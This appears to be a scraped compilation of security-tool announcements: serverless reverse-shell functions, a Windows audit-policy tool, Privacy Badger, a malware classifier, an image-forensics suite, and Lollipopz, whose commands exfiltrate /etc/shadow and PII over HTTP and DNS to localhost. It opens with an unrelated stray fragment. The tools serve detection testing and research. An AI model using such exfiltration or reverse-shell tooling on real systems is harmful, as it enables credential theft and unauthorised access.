  • Mapping requires the presence of a PDB for ntdll.dll, so the library will automatically download the latest version of this PDB from the Microsoft symbol server and cache it in %appdata%/Lunar/Dependencies


Serverless Prey - Serverless Functions For Establishing Reverse Shells To Lambda, Azure Functions, And Google Cloud Functions


Serverless Prey is a collection of serverless functions (FaaS) that, once launched to a cloud environment and invoked, establish a TCP reverse shell, enabling the user to introspect the underlying container:
  • Panther: AWS Lambda written in Node.js
  • Cougar: Azure Function written in C#
  • Cheetah: Google Cloud Function written in Go
This repository also contains research performed using these functions, including documentation on where secrets are stored, how to extract sensitive data, and how to identify monitoring / incident response data points.

Disclaimer
Serverless Prey functions are intended for research purposes only and should not be deployed to production accounts. By their nature, they provide shell access to your runtime environment, which can be abused by a malicious actor to exfiltrate sensitive data or gain unauthorized access to related cloud services.

Contributors
Eric Johnson - Principal Security Engineer, Puma Security
Brandon Evans - Senior Application Security Engineer, Asurion






Audix - A PowerShell Tool To Quickly Configure The Windows Event Audit Policies For Security Monitoring


Audix allows for the SIMPLE configuration of Windows Event Audit Policies. Windows audit policies are restrictive by default, which means that Incident Responders, Blue Teamers, CISOs, and anyone looking to monitor their environment through Windows Event Logs must configure the audit policy settings to provide more advanced logging.
This utility aims to capture the current audit policy settings, back them up (in case a restore to the previous state is required), and apply a more advanced audit policy to allow for better detection capability. In addition, it will enforce audit policy subcategories to ensure that these advanced settings persist. There is also a setting to adjust the log size limit.
Some examples of policy settings that Audix will enable:
-Event ID: 4698-4702 (A scheduled task was created/updated/disabled)
-Event ID: 4688 (A new process has been created.)

Running Audix
Git Clone the repo
git clone https://github.com/littl3field/Audix.git
Navigate to the folder and execute the command in your terminal. You must ensure you have Administrator rights to do this.
.\Audix.ps1
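
For context, these are the kinds of commands a tool like Audix automates via Windows' built-in auditpol.exe (an illustrative sketch from an elevated PowerShell prompt, not Audix's source):
# Back up the current policy before changing anything
auditpol /backup /file:C:\audit-policy-backup.csv
# Enable an advanced subcategory (feeds Event ID 4688)
auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable
# Review the resulting policy
auditpol /get /category:*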

Development
  • I will be adding these settings as a priority:
    • Increase logging size limit (DONE)
    • Enforce audit policy subcategory setting (DONE)
  • Add restore option
  • GPO Setting Configuration

Please note: This tool will only change the local security policy. If applied to a host with a GPO setting, it is best to use the same settings in a Group Policy default profile so all systems get the same config. If the GPO profile is not changed to meet these settings, a GPO force will override it.


Privacy Badger - A Browser Extension That Automatically Learns To Block Invisible Trackers


Privacy Badger is a browser extension that automatically learns to block invisible trackers. Instead of keeping lists of what to block, Privacy Badger learns by watching which domains appear to be tracking you as you browse the Web.

Privacy Badger sends the Do Not Track signal with your browsing. If trackers ignore your wishes, your Badger will learn to block them. Privacy Badger starts blocking once it sees the same tracker on three different websites.

Besides automatic tracker blocking, Privacy Badger removes outgoing link click tracking on Facebook, Google and Twitter, with more privacy protections on the way.
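
A toy Python sketch of the three-site heuristic described above (illustrative only; the real extension's logic is considerably more nuanced):
from collections import defaultdict

TRACKING_THRESHOLD = 3
seen_on = defaultdict(set)  # tracker domain -> first-party sites it tracked on

def observe(tracker, first_party):
    seen_on[tracker].add(first_party)
    return 'block' if len(seen_on[tracker]) >= TRACKING_THRESHOLD else 'allow'

for site in ('news.example', 'shop.example', 'blog.example'):
    print(site, observe('tracker.example', site))  # blocks on the third site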


Inhale - A Malware Analysis And Classification Tool


Inhale is a malware analysis and classification tool that is capable of automating and scaling many static analysis operations.
This is the beta release version, for testing purposes, feedback, and community development.

Background
Inhale started as a series of small scripts that I used when collecting and analyzing a large amount of malware from diverse sources. There are plenty of frameworks and tools for doing similar work, but none of them really matched my workflow of quickly finding, classifying, and storing information about a large number of files. Some also require expensive API keys and other services that cost money.
I ended up turning these scripts into something that people can quickly set up and use, whether you run from a research server, a laptop, or a low cost computer like a Raspberry Pi.

Install
This tool is built to run on Linux using Python3, ElasticSearch, radare2, yara and binwalk. jq is also needed to pretty print output from the database. Here are some of the basic instructions to install.

Python3
Install requirements
python3 -m pip install -r requirements.txt

Installing ElasticSearch (Debian)
Documentation
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
sudo apt-get install apt-transport-https
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt-get update && sudo apt-get install elasticsearch
sudo service elasticsearch start
You can also install manually by following this documentation
Additionally you can set up a full ELK stack for visualization and data analysis purposes. It is not necessary for using this tool.

Installing radare2
It's important to install radare2 from the repo, and not your package manager. Package manager versions don't come with all the bells and whistles required for inhale.
git clone https://github.com/radare/radare2
cd radare2
sys/install.sh

Installing Yara
Documentation
sudo apt-get install automake libtool make gcc
wget https://github.com/VirusTotal/yara/archive/v3.10.0.tar.gz
tar xvzf v3.10.0.tar.gz
cd yara-3.10.0/
./bootstrap.sh
./configure
make
sudo make install
If you get any errors about shared objects, try this to fix it.
sudo sh -c 'echo "/usr/local/lib" >> /etc/ld.so.conf'
sudo ldconfig

Installing binwalk
It's most likely best to simply install binwalk from the repo.
git clone https://github.com/ReFirmLabs/binwalk
cd binwalk
sudo python3 setup.py install
More information on installing additional features for binwalk is located here.

Usage
Specify the file you are scraping by type:
-f infile        input file
-d directory     input directory
-u url           input URL
-r url           recursive URL
Other options:
-t TAGS          Additional tags
-b               Turn off binwalk signatures
-y YARARULES     Custom Yara rules
-o OUTDIR        Store scraped files in a specific output dir (default: ./files/<date>/)
-i               Just print info, don't add files to database

Examples
Running inhale.py will perform all of the analysis on a given file/directory/url and print it to your terminal.
View info on /bin/ls, but don't add to the database
python3 inhale.py -f /bin/ls -i 
Add directory 'malwarez' to database
python3 inhale.py -d malwarez
Download this file and add to the database
python3 inhale.py -u https://thugcrowd.com/chal/skull
Download everything in this remote directory, tag it all as "phishing":
python3 inhale.py -r http://someurl.com/opendir/ -t phishing
PROTIP: Use this Twitter hashtag search to find interesting open directories that possibly contain malware. Use at your own risk.

Yara
You can pass your own yara rules with -y, this is a huge work in progress and almost everything in "YaraRules" is from https://github.com/kevthehermit/PasteHunter/tree/master/YaraRules. Shoutout @KevTheHermit

Querying the Database
Use db.sh to query (Soon to be a nice script)
db.sh *something* | jq .
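
Alternatively, you can query the index directly with the elasticsearch-py client (a sketch assuming the 7.x client matching the install above; the index name "inhaled" appears in the troubleshooting section below):
from elasticsearch import Elasticsearch

es = Elasticsearch(['http://localhost:9200'])
# Find everything tagged "phishing" and print a couple of data-model fields
res = es.search(index='inhaled', body={'query': {'match': {'tags': 'phishing'}}})
for hit in res['hits']['hits']:
    doc = hit['_source']
    print(doc.get('filename'), doc.get('sha256'))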

Data Model
The following is the current data model used for the elasticsearch database. Not every one of these will be used for every given file. Any r2_* tags are typically reserved for binaries of some sort.
Name         Description
-----------  ---------------------------------------------------------------------
filename     The full path of the binary
file_ext     The file extension
filesize     The file size
filetype     Filetype based on magic value. Not as reliable as binwalk signatures.
md5          The file's MD5 hash
sha1         The file's SHA1 hash
sha256       The file's SHA256 hash
added        The date the file was added
r2_arch      Architecture of the binary file
r2_baddr     The binary's base address
r2_binsz     The size of the program code
r2_bits      Architecture bits - 8/16/32/64 etc.
r2_canary    Whether or not stack canaries are enabled
r2_class     Binary class
r2_compiled  The date that the binary was compiled
r2_dbg_file  The debug file of the binary
r2_intrp     The interpreter that the binary calls if dynamically linked
r2_lang      The language of the source code
r2_lsyms     Whether or not there are debug symbols
r2_machine   The machine type, usually means the CPU the binary is for
r2_os        The OS that the machine is supposed to run on
r2_pic       Whether or not there is Position Independent Code
r2_relocs    Whether or not there are relocations
r2_rpath     The run-time search path - if applicable
r2_stripped  Whether or not the binary is stripped
r2_subsys    The binary's subsystem
r2_format    The binary format
r2_iorw      Whether ioctl calls are present
r2_type      The binary type - executable, shared object etc.
yara         Contains a list of yara matches
binwalk      Contains a list of binwalk signatures and their locations in the binary
tags         Any user defined tags passed with the -t flag
url          The origin url if a file was remotely downloaded
urls         Any URLs that have been pulled from the binary

Solutions to Issues
There are some known issues with this project (mainly to do with versions from package managers), and here I will track anything that has a solution for it.

ElasticSearch index field limit
If you get an error like this:
elasticsearch.exceptions.RequestError: RequestError(400, 'illegal_argument_exception', 'Limit of total fields [1000] in index [inhaled] has been exceeded')
You may have an older version of ElasticSearch. You can upgrade, or you can increase the field limit with this one-liner.
curl -XPUT 'localhost:9200/inhaled/_settings' -H 'Content-Type: application/json' -d'{ "index" : { "mapping" : { "total_fields" : { "limit" : "100000" }}}}'

Future Features
  • Re-doing the bot plugin for Discord / Matrix
  • Additional binary analysis features - pulling import/export tables, hashing of specific structures in the header, logging all strings etc.
  • Checking if the file is in the database before adding. This feature was removed previously due to specific issues with older versions of ES.
  • Configuration options for requests such as: user agent, timeout, proxy etc.
  • Dockerization of this entire project.

Contribution
PRs are welcome! If you want to give specific feedback, you can also DM me @netspooky on Twitter.

Thanks
I'd like to thank everyone who helped to test this tool with me. I'd also like to thank Plazmaz for doing an initial sweep of the code to make it a bit neater.
Greetz to: hermit, plazmaz, nux, x0, dustyfresh, aneilan, sshell, readme, dnz, notdan, rqu, specters, nullcookies, ThugCrowd, and everyone involved with ThreatLand and the TC Safari Zone.


Sherloq - An Open-Source Digital Image Forensic Toolset



An open source image forensic toolset

Introduction
"Forensic Image Analysis is the application of image science and domain expertise to interpret the content of an image and/or the image itself in legal matters. Major subdisciplines of Forensic Image Analysis with law enforcement applications include: Photogrammetry, Photographic Comparison, Content Analysis, and Image Authentication." (Scientific Working Group on Imaging Technologies)
Sherloq is a personal research project about implementing a fully integrated environment for digital image forensics. It is not meant as an automatic tool that decides whether an image is forged (such a tool will probably never exist...), but as a companion in putting various algorithms to work to discover potential image inconsistencies.
While many commercial solutions have unaffordable prices and are reserved to law enforcement and government agencies only, this toolset aims to be both a powerful and extensible framework providing a starting point for anyone interested in testing or developing state-of-the-art forensic algorithms.
I strongly believe that security-by-obscurity is the wrong way to offer any kind of security service (i.e. "Using this proprietary software I guarantee you that this photo is pristine... and you have to trust me!"). Instead, following the open-source mentality, everyone should be able to personally experiment with various techniques, gain more knowledge and share it with the community... even better if they propose code improvements! :)

Features
A Qt-based GUI provides highly responsive widgets for panning, zooming and inspecting images, while all image processing routines are handled by OpenCV for best efficiency. The software is based on a multi-document interface that can use floating or tabbed view for subwindows and tool outputs can be exported in various textual and graphical formats.
These are the currently planned functions [(***) = fully implemented, (**) = partially implemented, (*) = not yet implemented]:

General
  • Original Image: display the unaltered reference image for visual inspection (***)
  • Image Digest: compute byte and perceptual hashes together with extension ballistics (**)
  • Similarity Search: use reverse search services for finding similar images on the web (*)
  • Automatic Tagging: exploit deep learning algorithms for automatic picture tagging (*)

File
  • Metadata Dump: gather all metadata information and display security warnings (**)
  • EXIF Structure: dump the physical EXIF structure and display an interactive view (***)
  • Thumbnail Analysis: if present, extract embedded thumbnail and highlight discrepancies (***)
  • Geolocation Data: if present, get geographic data and locate them on a world map view (***)

Inspection
  • Enhancing Magnifier: apply local visual enhancements for better identifying forgeries (***)
  • Image Adjustments: apply standard adjustments (contrast, brightness, hue, saturation, ...) (***)
  • Tonal Range Sweep: interactive tonality range compression for easier artifact detection (***)
  • Reference Comparison: synchronized double view to compare reference and evidence images (***)

JPEG
  • Quality Estimation: extract quantization tables and estimate last saved JPEG quality (***)
  • Compression Ghosts: use error residuals to detect multiple compressions at different levels (**)
  • Double Compression: exploit First Digit Statistics to discover potential double compression (**)
  • Error Level Analysis: identify areas with different compression levels against a fixed quality (***)
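
To illustrate the Error Level Analysis idea above, here is a generic Python sketch using Pillow (this is not Sherloq's C++ implementation): resave the image at a fixed JPEG quality and amplify the residual, so regions compressed at a different level stand out.
from PIL import Image, ImageChops

def ela(path, quality=75, scale=15):
    original = Image.open(path).convert('RGB')
    original.save('resaved.jpg', 'JPEG', quality=quality)
    resaved = Image.open('resaved.jpg')
    diff = ImageChops.difference(original, resaved)  # compression residual
    return diff.point(lambda px: min(255, px * scale))  # amplify for visibility

ela('evidence.jpg').save('ela.png')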

Colors
  • RGB/HSV 3D Plots: display interactive 2D and 3D plots of RGB and HSV pixel data (*)
  • Color Space Conversion: convert image into RGB/HSV/YCbCr/Lab/CMYK color spaces (***)
  • Principal Component Analysis: use PCA to project RGB values onto a different vector space (***)
  • RGB Pixel Statistics: compute minimum/maximum/average RGB values for every pixel (***)

Luminance
  • Luminance Gradient: analyze brightness variations along X/Y axes of the image (***)
  • Frequency Separation: extract the finest details of the luminance channel (*)
  • Echo Edge Filter: use 2D Laplacian filter to reveal artificial blurred zones (***)
  • Wavelet Reconstruction: re-synthesize image varying wavelet coefficient thresholds (*)

Noise
  • Noise Extraction: estimate and separate the natural noise component of the image (***)
  • Min/Max Deviation: highlight pixels deviating from block-based min/max statistics (***)
  • SNR Consistency: evaluate uniformity of signal-to-noise ratio across the image (***)
  • Noise Segmentation: cluster uniform noise areas for easier tampering detection (*)

Tampering
  • Contrast Enhancement: analyze histogram inconsistencies caused by enhancements (***)
  • Clone Detection: use invariant feature descriptors for copy/rotate clone area detection (**)
  • Resampling Detection: analyze 2D pixel interpolation for detecting resampling traces (**)
  • Splicing Detection: use DCT coefficient statistics for automatic splicing zone detection (*)

Setup
The software is written in C++11 using the Qt Framework for a platform-independent GUI and the OpenCV Library for efficient image processing. Other external dependencies are ExifTool for metadata extraction, LIBSVM for forgery detection and AlgLib for histogram manipulation.
Even if the project objective is clear, the software is currently an early prototype, so some functionalities are still missing (see the list above) and it can be run only from Qt Creator under Linux. I put it on GitHub to track my development progress even during the alpha stage, so expect issues, bugs and installation headaches; if you want to take a look around, feel free to contact me if you are experiencing problems in making it run.

Screenshots

File Analysis: Metadata, Digest and EXIF

Color Analysis: Space Conversion, PCA Projection, Histograms and Statistics

Visual Inspection: Magnifier Loupe, Image Adjustments and Evidence Comparison

JPEG Analysis: Quantization Tables, Compression Ghosts and Error Level Analysis

Luminance and Noise: Light Gradient, Echo Edge, Min/Max Deviation and SNR Consistency


Lollipopz - Data Exfiltration Utility For Testing Detection Capabilities


Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.

Exfiltration How-To

/etc/shadow -> HTTP GET requests

Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

PII -> PNG embedded in HTTP Response

Server
$ ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Server -lp 37650 -o output.log

Client
# ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r

PII -> DNS subdomains querying

Server
# ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Server -lp 53 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r

